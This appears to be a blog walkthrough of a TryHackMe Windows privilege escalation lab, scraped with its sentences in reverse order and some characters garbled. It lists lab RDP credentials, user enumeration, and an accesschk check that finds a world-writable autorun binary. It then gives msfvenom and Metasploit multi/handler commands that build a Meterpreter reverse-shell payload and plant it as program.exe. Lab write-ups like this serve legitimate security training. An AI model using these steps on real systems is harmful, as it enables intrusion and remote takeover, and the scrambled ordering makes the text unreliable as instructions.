Place program.exe in ‘C:\Program Files\Autorun Program’.Copy the generated file, program.exe, to the Windows VM.Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost= -f exe -o program.exe.In Metasploit (msf > prompt) type: set lhost.In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp.In Metasploit (msf > prompt) type: use multi/handler.Open command prompt and type: msfconsole.From the output, notice that the “Everyone” user group has “FILE_ALL_ACCESS” permission on the “program.exe” file.In command prompt type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu “C:\Program Files\Autorun Program”.From the listed results, notice that the “My Program” entry is pointing to “C:\Program Files\Autorun Program\program.exe”.Open command prompt and type: C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe.In this task, we use Autorun utility that is used to set auto-starting programs upon boot. Who is the other non-default user on the machine?īy run net user in a command prompt we retrieve the users on the machine:Īnd the other non-default user is TCM. Open a command prompt and run ‘net user’. Rdesktop -u user -p "password321" $IP -g 90%Ģ. And then, we login in RDP by using the given credentials. We click Start Machine on the challenge page and wait that the machine deploy. Deploy the machine and log into the user account via RDP Your credentials are:įor any administrative actions you might take, your credentials are: This lab was built utilizing Sagi Shahar’s privesc workshop () and utilized as part of The Cyber Mentor’s Windows Privilege Escalation Udemy course ().Īll tools needed to complete this course are on the user desktop (C:\Users\user\Desktop\Tools). This room will teach you a variety of Windows privilege escalation tactics, including kernel exploits, DLL hijacking, service exploits, registry exploits, and more. We just connect in VPN to the TryHackMe network. Students will learn how to escalate privileges using a very vulnerable Windows 7 VM.
0 Comments
Leave a Reply. |